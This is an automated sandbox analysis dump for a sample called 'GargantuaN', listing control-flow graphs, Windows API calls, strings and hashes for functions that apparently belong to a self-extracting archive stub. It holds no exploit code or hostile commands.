                                                        control_flow_graph 268 d60863-d60886 call d6ec50 GetModuleHandleW 271 d608e7-d60b48 268->271 272 d60888-d6089f GetProcAddress 268->272 273 d60c14-d60c40 GetModuleFileNameW call d5c29a call d60602 271->273 274 d60b4e-d60b59 call d775fb 271->274 275 d608a1-d608b7 272->275 276 d608b9-d608c9 GetProcAddress 272->276 291 d60c42-d60c4e call d5b146 273->291 274->273 285 d60b5f-d60b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 d608e5 276->279 280 d608cb-d608e0 276->280 279->271 280->279 288 d60b8f-d60b9b SetFilePointer 285->288 289 d60c08-d60c0f CloseHandle 285->289 288->289 292 d60b9d-d60bb9 ReadFile 288->292 289->273 297 d60c50-d60c5b call d6081b 291->297 298 d60c7d-d60ca4 call d5c310 GetFileAttributesW 291->298 292->289 294 d60bbb-d60be0 292->294 296 d60bfd-d60c06 call d60371 294->296 296->289 304 d60be2-d60bfc call d6081b 296->304 297->298 309 d60c5d-d60c7b CompareStringW 297->309 306 d60ca6-d60caa 298->306 307 d60cae 298->307 304->296 306->291 310 d60cac 306->310 311 d60cb0-d60cb5 307->311 309->298 309->306 310->311 313 d60cb7 311->313 314 d60cec-d60cee 311->314 315 d60cb9-d60ce0 call d5c310 GetFileAttributesW 313->315 316 d60cf4-d60d0b call d5c2e4 call d5b146 314->316 317 d60dfb-d60e05 314->317 323 d60ce2-d60ce6 315->323 324 d60cea 315->324 327 d60d73-d60da6 call d54092 AllocConsole 316->327 328 d60d0d-d60d6e call d6081b * 2 call d5e617 call d54092 call d5e617 call d6a7e4 316->328 323->315 326 d60ce8 323->326 324->314 326->314 333 d60df3-d60df5 ExitProcess 327->333 334 d60da8-d60ded GetCurrentProcessId AttachConsole call d73e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 00D6087C
                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D6088E
                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D608BF
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D60B69
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D60B83
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D60B93
                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,00D83C7C,00000000), ref: 00D60BB1
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D60C09
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D60C1E
                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D83C7C,?,00000000,?,00000800), ref: 00D60C72
                                                        • GetFileAttributesW.KERNELBASE(?,?,00D83C7C,00000800,?,00000000,?,00000800), ref: 00D60C9C
                                                        • GetFileAttributesW.KERNEL32(?,?,00D83D44,00000800), ref: 00D60CD8
                                                          • Part of subcall function 00D6081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                          • Part of subcall function 00D6081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        • _swprintf.LIBCMT ref: 00D60D4A
                                                        • _swprintf.LIBCMT ref: 00D60D96
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • AllocConsole.KERNEL32 ref: 00D60D9E
                                                        • GetCurrentProcessId.KERNEL32 ref: 00D60DA8
                                                        • AttachConsole.KERNEL32(00000000), ref: 00D60DAF
                                                        • _wcslen.LIBCMT ref: 00D60DC4
                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D60DD5
                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00D60DDC
                                                        • Sleep.KERNEL32(00002710), ref: 00D60DE7
                                                        • FreeConsole.KERNEL32 ref: 00D60DED
                                                        • ExitProcess.KERNEL32 ref: 00D60DF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                        • API String ID: 1207345701-3298887752
                                                        • Opcode ID: a8af184c5c53166389e531a5625aacdbd680d3d48c7a8203369c2db2a33e55e6
                                                        • Instruction ID: b158e382cf9e52d4bd159380532b02865d08c05c2113f0e8df9f435a87b67d4d
                                                        • Opcode Fuzzy Hash: a8af184c5c53166389e531a5625aacdbd680d3d48c7a8203369c2db2a33e55e6
                                                        • Instruction Fuzzy Hash: 3AD14DB1008385AFD721AF54C849B9FBBE8FF85B04F51491DF68996350DBB08648CBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 347 d6c73f-d6c757 call d6eb78 call d6ec50 352 d6d40d-d6d418 347->352 353 d6c75d-d6c787 call d6b314 347->353 353->352 356 d6c78d-d6c792 353->356 357 d6c793-d6c7a1 356->357 358 d6c7a2-d6c7b7 call d6af98 357->358 361 d6c7b9 358->361 362 d6c7bb-d6c7d0 call d61fbb 361->362 365 d6c7d2-d6c7d6 362->365 366 d6c7dd-d6c7e0 362->366 365->362 367 d6c7d8 365->367 368 d6c7e6 366->368 369 d6d3d9-d6d404 call d6b314 366->369 367->369 371 d6c9be-d6c9c0 368->371 372 d6ca5f-d6ca61 368->372 373 d6ca7c-d6ca7e 368->373 374 d6c7ed-d6c7f0 368->374 369->357 380 d6d40a-d6d40c 369->380 371->369 378 d6c9c6-d6c9d2 371->378 372->369 376 d6ca67-d6ca77 SetWindowTextW 372->376 373->369 377 d6ca84-d6ca8b 373->377 374->369 379 d6c7f6-d6c850 call d6a64d call d5bdf3 call d5a544 call d5a67e call d56edb 374->379 376->369 377->369 381 d6ca91-d6caaa 377->381 382 d6c9e6-d6c9eb 378->382 383 d6c9d4-d6c9e5 call d77686 378->383 435 d6c98f-d6c9a4 call d5a5d1 379->435 380->352 385 d6cab2-d6cac0 call d73e13 381->385 386 d6caac 381->386 389 d6c9f5-d6ca00 call d6b48e 382->389 390 d6c9ed-d6c9f3 382->390 383->382 385->369 403 d6cac6-d6cacf 385->403 386->385 394 d6ca05-d6ca07 389->394 390->394 396 d6ca12-d6ca32 call d73e13 call d73e3e 394->396 397 d6ca09-d6ca10 call d73e13 394->397 422 d6ca34-d6ca3b 396->422 423 d6ca4b-d6ca4d 396->423 397->396 407 d6cad1-d6cad5 403->407 408 d6caf8-d6cafb 403->408 411 d6cb01-d6cb04 407->411 413 d6cad7-d6cadf 407->413 410 d6cbe0-d6cbee call d60602 408->410 408->411 432 d6cbf0-d6cc04 call d7279b 410->432 416 d6cb06-d6cb0b 411->416 417 d6cb11-d6cb2c 411->417 413->369 420 d6cae5-d6caf3 call d60602 413->420 416->410 416->417 436 d6cb76-d6cb7d 417->436 437 d6cb2e-d6cb68 417->437 420->432 429 d6ca42-d6ca4a call d77686 422->429 430 d6ca3d-d6ca3f 422->430 423->369 431 d6ca53-d6ca5a call d73e2e 423->431 429->423 430->429 431->369 446 d6cc06-d6cc0a 432->446 447 d6cc11-d6cc62 call d60602 call d6b1be GetDlgItem SetWindowTextW SendMessageW call d73e49 432->447 453 d6c855-d6c869 SetFileAttributesW 435->453 454 d6c9aa-d6c9b9 call d5a55a 435->454 443 d6cb7f-d6cb97 call d73e13 436->443 444 d6cbab-d6cbce call d73e13 * 2 436->444 470 d6cb6c-d6cb6e 437->470 471 d6cb6a 437->471 443->444 457 d6cb99-d6cba6 call d605da 443->457 444->432 475 d6cbd0-d6cbde call d605da 444->475 446->447 452 d6cc0c-d6cc0e 446->452 481 d6cc67-d6cc6b 447->481 452->447 458 d6c90f-d6c91f GetFileAttributesW 453->458 459 d6c86f-d6c8a2 call d5b991 call d5b690 call d73e13 453->459 454->369 457->444 458->435 468 d6c921-d6c930 DeleteFileW 458->468 490 d6c8a4-d6c8b3 call d73e13 459->490 491 d6c8b5-d6c8c3 call d5bdb4 459->491 468->435 474 d6c932-d6c935 468->474 470->436 471->470 478 d6c939-d6c965 call d54092 GetFileAttributesW 474->478 475->432 488 d6c937-d6c938 478->488 489 d6c967-d6c97d MoveFileW 478->489 481->369 485 d6cc71-d6cc85 SendMessageW 481->485 485->369 488->478 489->435 492 d6c97f-d6c989 MoveFileExW 489->492 490->491 497 d6c8c9-d6c908 call d73e13 call d6fff0 490->497 491->454 491->497 492->435 497->458
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D6C744
                                                          • Part of subcall function 00D6B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D6B3FB
                                                        • _wcslen.LIBCMT ref: 00D6CA0A
                                                        • _wcslen.LIBCMT ref: 00D6CA13
                                                        • SetWindowTextW.USER32(?,?), ref: 00D6CA71
                                                        • _wcslen.LIBCMT ref: 00D6CAB3
                                                        • _wcsrchr.LIBVCRUNTIME ref: 00D6CBFB
                                                        • GetDlgItem.USER32(?,00000066), ref: 00D6CC36
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00D6CC46
                                                        • SendMessageW.USER32(00000000,00000143,00000000,00D9A472), ref: 00D6CC54
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D6CC7F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                        • API String ID: 2804936435-312220925
                                                        • Opcode ID: 7ea24b152318fe5ded822a03b10de3d58b322b72e68e3531baec4df676f384b2
                                                        • Instruction ID: 6e70748a79b6dea4ae771b1cccee7ce3e5db73811307c7f4784e8e6634596084
                                                        • Opcode Fuzzy Hash: 7ea24b152318fe5ded822a03b10de3d58b322b72e68e3531baec4df676f384b2
                                                        • Instruction Fuzzy Hash: D3E14272900218ABDF24DBA4DC85DEE73BCEB05350F4485A6FA49E7140EB749E849F70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D5DA70
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D5DAAC
                                                          • Part of subcall function 00D5C29A: _wcslen.LIBCMT ref: 00D5C2A2
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                          • Part of subcall function 00D61B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D5BAE9,00000000,?,?,?,0002047E), ref: 00D61BA0
                                                        • _wcslen.LIBCMT ref: 00D5DDE9
                                                        • __fprintf_l.LIBCMT ref: 00D5DF1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                        • API String ID: 566448164-801612888
                                                        • Opcode ID: 7a307d7935db588c51eb02cc1ad3929dc14b9f7f86e44e6269ba22d595598e17
                                                        • Instruction ID: a4458d8177f7e13e70b4d05bca24d8e7d595ddbe2a33dfbb609b58250aa1a552
                                                        • Opcode Fuzzy Hash: 7a307d7935db588c51eb02cc1ad3929dc14b9f7f86e44e6269ba22d595598e17
                                                        • Instruction Fuzzy Hash: 2D32C2719002189BCF28EF68C841AEE77A5FF14701F44455AFD4A97281EBB1DE89CB74
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00D6B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                          • Part of subcall function 00D6B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                          • Part of subcall function 00D6B568: IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                          • Part of subcall function 00D6B568: TranslateMessage.USER32(?), ref: 00D6B5AC
                                                          • Part of subcall function 00D6B568: DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        • GetDlgItem.USER32(00000068,00DAFCB8), ref: 00D6D4E8
                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00D6AF07,00000001,?,?,00D6B7B9,00D8506C,00DAFCB8,00DAFCB8,00001000,00000000,00000000), ref: 00D6D510
                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6D51B
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00D835F4), ref: 00D6D529
                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D53F
                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D6D559
                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D59D
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D6D5AB
                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D5BA
                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D5E1
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00D843F4), ref: 00D6D5F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                        • String ID: \
                                                        • API String ID: 3569833718-2967466578
                                                        • Opcode ID: 32b62bf12331ad747bde6f388ccf4ab248c727503f7b5ac4bcd1cf09bb5a5d99
                                                        • Instruction ID: d33bfa5cb058262f6b8bb55b4ed53a9564f1d41b960baace12fa8685cc7c3930
                                                        • Opcode Fuzzy Hash: 32b62bf12331ad747bde6f388ccf4ab248c727503f7b5ac4bcd1cf09bb5a5d99
                                                        • Instruction Fuzzy Hash: FE31D371545342EFD301EF20EC4AFAB7FACEF86704F000609F551D6290DB648A089B76
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 812 d6a6c2-d6a6df FindResourceW 813 d6a6e5-d6a6f6 SizeofResource 812->813 814 d6a7db 812->814 813->814 816 d6a6fc-d6a70b LoadResource 813->816 815 d6a7dd-d6a7e1 814->815 816->814 817 d6a711-d6a71c LockResource 816->817 817->814 818 d6a722-d6a737 GlobalAlloc 817->818 819 d6a7d3-d6a7d9 818->819 820 d6a73d-d6a746 GlobalLock 818->820 819->815 821 d6a7cc-d6a7cd GlobalFree 820->821 822 d6a74c-d6a76a call d70320 820->822 821->819 826 d6a7c5-d6a7c6 GlobalUnlock 822->826 827 d6a76c-d6a78e call d6a626 822->827 826->821 827->826 832 d6a790-d6a798 827->832 833 d6a7b3-d6a7c1 832->833 834 d6a79a-d6a7ae GdipCreateHBITMAPFromBitmap 832->834 833->826 834->833 835 d6a7b0 834->835 835->833
                                                        APIs
                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6D5
                                                        • SizeofResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6EC
                                                        • LoadResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A703
                                                        • LockResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A712
                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A72D
                                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A73E
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00D6A7C6
                                                          • Part of subcall function 00D6A626: GdipAlloc.GDIPLUS(00000010), ref: 00D6A62C
                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D6A7A7
                                                        • GlobalFree.KERNEL32(00000000), ref: 00D6A7CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                        • String ID: PNG
                                                        • API String ID: 541704414-364855578
                                                        • Opcode ID: 303deaee58e10d1b8502a703de4b47bacc1e7f922483fe05d5575d52c3bfea41
                                                        • Instruction ID: 2e0ba3b364504e95ab2b8f9890a0e7e581dbf4c8ff3ff4b29150ff14182bdd7e
                                                        • Opcode Fuzzy Hash: 303deaee58e10d1b8502a703de4b47bacc1e7f922483fe05d5575d52c3bfea41
                                                        • Instruction Fuzzy Hash: 63314F75600702AFD7109F25EC89D1BBBADEF84B51B040919F849D2761EB31D9489FB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 837 d6d78f-d6d7a7 call d6ec50 840 d6d7ad-d6d7b9 call d73e13 837->840 841 d6d9e8-d6d9f0 837->841 840->841 844 d6d7bf-d6d7e7 call d6fff0 840->844 847 d6d7f1-d6d7ff 844->847 848 d6d7e9 844->848 849 d6d812-d6d818 847->849 850 d6d801-d6d804 847->850 848->847 852 d6d85b-d6d85e 849->852 851 d6d808-d6d80e 850->851 853 d6d837-d6d844 851->853 854 d6d810 851->854 852->851 855 d6d860-d6d866 852->855 857 d6d9c0-d6d9c2 853->857 858 d6d84a-d6d84e 853->858 856 d6d822-d6d82c 854->856 859 d6d86d-d6d86f 855->859 860 d6d868-d6d86b 855->860 861 d6d82e 856->861 862 d6d81a-d6d820 856->862 863 d6d9c6 857->863 858->863 864 d6d854-d6d859 858->864 865 d6d882-d6d898 call d5b92d 859->865 866 d6d871-d6d878 859->866 860->859 860->865 861->853 862->856 868 d6d830-d6d833 862->868 871 d6d9cf 863->871 864->852 872 d6d8b1-d6d8bc call d5a231 865->872 873 d6d89a-d6d8a7 call d61fbb 865->873 866->865 869 d6d87a 866->869 868->853 869->865 874 d6d9d6-d6d9d8 871->874 883 d6d8be-d6d8d5 call d5b6c4 872->883 884 d6d8d9-d6d8e6 ShellExecuteExW 872->884 873->872 882 d6d8a9 873->882 877 d6d9e7 874->877 878 d6d9da-d6d9dc 874->878 877->841 878->877 881 d6d9de-d6d9e1 ShowWindow 878->881 881->877 882->872 883->884 884->877 886 d6d8ec-d6d8f9 884->886 888 d6d90c-d6d90e 886->888 889 d6d8fb-d6d902 886->889 891 d6d925-d6d944 call d6dc3b 888->891 892 d6d910-d6d919 888->892 889->888 890 d6d904-d6d90a 889->890 890->888 893 d6d97b-d6d987 CloseHandle 890->893 891->893 906 d6d946-d6d94e 891->906 892->891 900 d6d91b-d6d923 ShowWindow 892->900 894 d6d998-d6d9a6 893->894 895 d6d989-d6d996 call d61fbb 893->895 894->874 899 d6d9a8-d6d9aa 894->899 895->871 895->894 899->874 903 d6d9ac-d6d9b2 899->903 900->891 903->874 905 d6d9b4-d6d9be 903->905 905->874 906->893 907 d6d950-d6d961 GetExitCodeProcess 906->907 907->893 908 d6d963-d6d96d 907->908 909 d6d974 908->909 910 d6d96f 908->910 909->893 910->909
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D6D7AE
                                                        • ShellExecuteExW.SHELL32(?), ref: 00D6D8DE
                                                        • ShowWindow.USER32(?,00000000), ref: 00D6D91D
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00D6D959
                                                        • CloseHandle.KERNEL32(?), ref: 00D6D97F
                                                        • ShowWindow.USER32(?,00000001), ref: 00D6D9E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                        • String ID: .exe$.inf
                                                        • API String ID: 36480843-3750412487
                                                        • Opcode ID: 1a07afdf489b6bde8023d8a59bbb8a29a2c3dbb0afc060742f58485ce0ae53cb
                                                        • Instruction ID: 60af8ab9d99c9aa3f090247c3f126a78c04406f187e769e231f179f5f3f3d711
                                                        • Opcode Fuzzy Hash: 1a07afdf489b6bde8023d8a59bbb8a29a2c3dbb0afc060742f58485ce0ae53cb
                                                        • Instruction Fuzzy Hash: 9751C471A043809BDB319F64B844BABBBE6EF46744F08081EF9C5D7291D7718A48DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 911 d7a95b-d7a974 912 d7a976-d7a986 call d7ef4c 911->912 913 d7a98a-d7a98f 911->913 912->913 923 d7a988 912->923 914 d7a991-d7a999 913->914 915 d7a99c-d7a9c0 MultiByteToWideChar 913->915 914->915 917 d7a9c6-d7a9d2 915->917 918 d7ab53-d7ab66 call d6fbbc 915->918 920 d7aa26 917->920 921 d7a9d4-d7a9e5 917->921 927 d7aa28-d7aa2a 920->927 924 d7a9e7-d7a9f6 call d82010 921->924 925 d7aa04-d7aa15 call d78e06 921->925 923->913 929 d7ab48 924->929 938 d7a9fc-d7aa02 924->938 925->929 939 d7aa1b 925->939 928 d7aa30-d7aa43 MultiByteToWideChar 927->928 927->929 928->929 932 d7aa49-d7aa5b call d7af6c 928->932 933 d7ab4a-d7ab51 call d7abc3 929->933 940 d7aa60-d7aa64 932->940 933->918 942 d7aa21-d7aa24 938->942 939->942 940->929 943 d7aa6a-d7aa71 940->943 942->927 944 d7aa73-d7aa78 943->944 945 d7aaab-d7aab7 943->945 944->933 946 d7aa7e-d7aa80 944->946 947 d7ab03 945->947 948 d7aab9-d7aaca 945->948 946->929 949 d7aa86-d7aaa0 call d7af6c 946->949 950 d7ab05-d7ab07 947->950 951 d7aae5-d7aaf6 call d78e06 948->951 952 d7aacc-d7aadb call d82010 948->952 949->933 966 d7aaa6 949->966 955 d7ab41-d7ab47 call d7abc3 950->955 956 d7ab09-d7ab22 call d7af6c 950->956 951->955 965 d7aaf8 951->965 952->955 964 d7aadd-d7aae3 952->964 955->929 956->955 969 d7ab24-d7ab2b 956->969 968 d7aafe-d7ab01 964->968 965->968 966->929 968->950 970 d7ab67-d7ab6d 969->970 971 d7ab2d-d7ab2e 969->971 972 d7ab2f-d7ab3f WideCharToMultiByte 970->972 971->972 972->955 973 d7ab6f-d7ab76 call d7abc3 972->973 973->933
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D75695,00D75695,?,?,?,00D7ABAC,00000001,00000001,2DE85006), ref: 00D7A9B5
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D7ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00D7AA3B
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D7AB35
                                                        • __freea.LIBCMT ref: 00D7AB42
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
